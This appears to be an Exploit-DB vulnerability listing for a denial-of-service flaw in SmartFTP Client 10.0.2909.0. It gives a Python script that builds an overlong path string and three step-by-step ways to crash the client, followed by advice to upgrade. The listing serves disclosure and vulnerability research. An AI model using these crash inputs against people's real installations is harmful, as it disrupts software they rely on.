SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service

vendor:

SmartFTP Client

by:

Eric Salario

7,5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: SmartFTP Client

Affected Version From: 10.0.2909.0

Affected Version To: 10.0.2909.0

Patch Exists: YES

Related CWE: N/A

CPE: a:smartftp:smartftp_client

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Microsoft Windows 10 32 bit and 64 bit

2021

SmartFTP Client 10.0.2909.0 – ‘Multiple’ Denial of Service

The vulnerability exists in SmartFTP Client 10.0.2909.0, which allows an attacker to cause a denial of service by entering a non-existing IP address in the FTP server, copying the content of the 'path.txt' generated by the python script, or by clearing the history in the 'New Connection' bar and typing anything in it.

Mitigation:

Upgrade to the latest version of SmartFTP Client.

Source

Exploit-DB raw data:

# Exploit Title: SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service
# Date: 9/5/2021
# Exploit Author: Eric Salario
# Vendor Homepage: https://www.smartftp.com/en-us/
# Software Link: https://www.smartftp.com/en-us/download
# Version: 10.0.2909.0 (32 and 64 bit)
# Tested on: Microsoft Windows 10 32 bit and 64 bit

=========================================================================

buffer = "//"
buffer += "A" * 423

f = open ("path.txt", "w")
f.write(buffer)
f.close()

1. Run the python script
2. Open SmartFTP > New Connection > FTPS (explicit)
3. Enter a non existing ip the FTP server can't reach (e.g 255.255.255.255)
4. In Path, copy paste the content of the "path.txt" generated by the python script
5. Click "OK"
6. SmartFTP client crashes

=======================================================================
1. Open SmartFTP > New Connection > FTPS (explicit)
2. Enter a non existing ip the FTP server can't reach (e.g 255.255.255.255)
3. In Path, type slash ("/") and click "OK"
4. The app should return "Error 0x80072741"
5. In the path's search bar, replace slash ("/") with whatever and press enter
6. SmartFTP client crashes

=======================================================================

1. Open SmartFTP
2. In the "New Connection" bar, clear the history (dropdown to the right of the bar)
3. Once the history is empty, click the bar and type anything
3. SmartFTP client crashes